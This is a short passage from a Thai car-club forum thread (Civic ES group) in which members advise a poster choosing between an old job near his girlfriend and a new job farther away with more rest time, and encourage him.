-ถ้าที่เก่าได้เจอแฟนทุกวันก้อจิง แต่เวลาพักผ่อนแทบจะไม่มีเลย ผมมองว่าถ้าไปกลับทุกวันมันไกลและเหนื่อยมากด้วยครับ
-ถ้าที่ใหม่ก้อไกลแฟน แต่เวลาพักผ่อนก้อเยอะขึ้น อยุที่เวลาว่างเราก้อสามารถสรรค์สร้างให้กับแฟนกับครอบครัวได้ครับ

ยังไงก้อเอาใจช่วยนะครับ สู้ๆครับ ปัญหามีไว้แก้ครับ ฟ้าหลังฝนย่อมสดใสเสมอ...
วุฒิชัย

ชื่อเล่น: ตั้ม

เข้าร่วม: 26 มิถุนา 2011
ตอบ: 4151

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3281
ให้คำขอบคุณ: 4338

พุธ, 11 มกรา 2012 19:29 - นอกเรื่องหน่อยคับ ปรึกษาด่ววนเลย "เรื่องงานครับ" Update วันนี้คุยกะ HR ที่ใหม่แล
ที่ไหนดีก็ทำเถอะครับ
งานหายากแล้วครับ
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.